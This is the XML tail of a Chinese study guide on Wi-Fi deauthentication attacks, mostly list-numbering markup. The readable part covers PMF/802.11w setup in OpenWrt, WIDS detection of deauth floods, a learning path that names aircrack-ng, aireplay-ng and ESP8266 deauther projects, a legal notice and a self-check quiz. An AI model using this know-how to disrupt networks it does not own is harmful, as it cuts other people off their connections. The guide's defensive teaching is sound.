              <w:t># group_mgmt_cipher=AES-128-CMAC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OpenWrt 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/etc/config/wireless</w:t>
              <w:br/>
              <w:t>config wifi-iface</w:t>
              <w:br/>
              <w:t xml:space="preserve">    option encryption 'psk2+ccmp'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option ieee80211w '2'  # 0=禁用, 1=可选, 2=强制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 PMF 是否启用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方法1：查看 Beacon 帧中的 RSN IE</w:t>
              <w:br/>
              <w:t># 如果包含 Management Frame Protection 字段，则启用了PMF</w:t>
              <w:br/>
              <w:br/>
              <w:t># 方法2：客户端连接后查看</w:t>
              <w:br/>
              <w:t>iw dev wlan0 link</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t># 查看输出中是否有 "MFP: active" 字样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6.4 其他防御手段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WIDS/WIPS（无线入侵检测/防御系统）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监测 Deauth/Disassoc 帧速率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阈值检测：短时间内大量出现 → 告警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可定位攻击源位置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企业级AP通常内置此功能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RSSI 检测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真实AP的信号强度相对稳定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攻击源的信号特征可能不同（忽强忽弱、方向异常）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可作为辅助检测手段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网络架构优化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多AP冗余覆盖，快速漫游（802.11r）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合理调整功率，缩小覆盖范围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企业网络使用 802.1X 认证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📖 第七阶段：学习路径与进阶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学习路线图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入门级：</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ├─ 理解 802.11 基本概念（帧类型、状态机）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ├─ 搭建实验环境（Kali + 无线网卡）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ├─ 学会使用 aircrack-ng 基础工具</w:t>
              <w:br/>
              <w:t xml:space="preserve">  └─ 能用 Wireshark 分析管理帧</w:t>
              <w:br/>
              <w:br/>
              <w:t>进阶级：</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ├─ 深入理解 Deauth/Disassoc 帧结构（字节级）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ├─ 掌握 aireplay-ng 各种攻击模式</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ├─ 理解 WPA 四次握手的原理</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ├─ 学习 PMF/802.11w 的工作机制</w:t>
              <w:br/>
              <w:t xml:space="preserve">  └─ 能自己用 Scapy 构造管理帧</w:t>
              <w:br/>
              <w:br/>
              <w:t>高级：</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ├─ 研究 ESP8266/ESP32 源码实现</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ├─ 理解各种绕过和对抗技术</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ├─ 学习企业级无线安全（802.1X、EAP）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ├─ 研究 WPA3 新特性和漏洞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无线入侵检测与防御系统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7.2 推荐学习资源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官方文档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IEEE 802.11 标准（最新版）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Wi-Fi Alliance PMF 技术白皮书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aircrack-ng 官方文档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开源项目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SpacehuhnTech/esp8266_deauther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aircrack-ng/aircrack-ng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bettercap/bettercap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书籍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《802.11 无线局域网权威指南》（CWNA 教材）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《无线网络安全》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Kali Linux 无线渗透测试相关书籍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7.3 法律与道德提醒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重要声明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本文仅用于技术学习和安全研究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未经授权对他人网络进行攻击属于违法行为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请仅在自己拥有的、或获得书面授权的网络上进行测试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遵守当地法律法规，尊重他人网络安全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✅ 知识自检清单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学完本指南后，试着回答这些问题检验掌握程度：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Deauth 和 Disassoc 的帧类型子类型分别是什么？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Deauth 帧有多少字节？Reason Code 在哪个偏移位置？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Deauth 和 Disassoc 分别对应状态机的什么跳转？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为什么管理帧可以被伪造？根本原因是什么？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PMF 是如何防止 Deauth 攻击的？用了什么密钥？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 Query 机制的作用是什么？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PMF Optional 和 Required 的区别是什么？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Deauth 攻击在 WPA 破解中起什么作用？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如何用 Wireshark 过滤 Deauth 帧？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 PMF，还有哪些防御 Deauth 攻击的方法？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 Deauth + Disassoc 的完整系统学习指南，从协议原理到代码实现，从工具实战到防御技术，覆盖了全链路知识体系。建议按照阶段顺序学习，配合实际动手实验效果最佳。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06759">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806760">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806761">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806762">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806763">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806764">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806765">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806766">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806767">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806768">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806769">
    <w:lvl>
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806770">
    <w:lvl>
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806771">
    <w:lvl>
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806772">
    <w:lvl>
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806773">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806774">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806775">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806776">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806777">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806778">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806779">
    <w:lvl>
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806780">
    <w:lvl>
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806781">
    <w:lvl>
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806782">
    <w:lvl>
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806783">
    <w:lvl>
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806784">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806785">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806786">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806787">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806788">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806789">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806790">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806791">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806792">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806793">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806794">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806795">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806796">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806797">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806798">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806799">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806800">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806801">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806802">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806803">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806804">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806805">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806806">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806807">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806808">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806809">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806810">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806811">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806812">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806813">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806814">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806815">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806816">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806817">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806818">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806819">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806820">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806821">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806822">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806823">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806824">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806825">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806826">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806827">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806828">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="□"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806829">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="□"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806830">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="□"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806831">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="□"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806832">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="□"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806833">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="□"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806834">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="□"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806835">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="□"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806836">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="□"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2806837">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="□"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="2806759"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="2806760"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="2806761"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="2806762"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="2806763"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="2806764"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="2806765"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="2806766"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="2806767"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="2806768"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="2806769"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="2806770"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="2806771"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="2806772"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="2806773"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="2806774"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="2806775"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="2806776"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="2806777"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="2806778"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="2806779"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="2806780"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="2806781"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="2806782"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="2806783"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="2806784"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="2806785"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="2806786"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="2806787"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="2806788"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="2806789"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="2806790"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="2806791"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="2806792"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="2806793"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="2806794"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="2806795"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="2806796"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="2806797"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="2806798"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="2806799"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="2806800"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="2806801"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="2806802"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="2806803"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="2806804"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="2806805"/>
  </w:num>
  <w:num w:numId="48">
    <w:abstractNumId w:val="2806806"/>
  </w:num>
  <w:num w:numId="49">
    <w:abstractNumId w:val="2806807"/>
  </w:num>
  <w:num w:numId="50">
    <w:abstractNumId w:val="2806808"/>
  </w:num>
  <w:num w:numId="51">
    <w:abstractNumId w:val="2806809"/>
  </w:num>
  <w:num w:numId="52">
    <w:abstractNumId w:val="2806810"/>
  </w:num>
  <w:num w:numId="53">
    <w:abstractNumId w:val="2806811"/>
  </w:num>
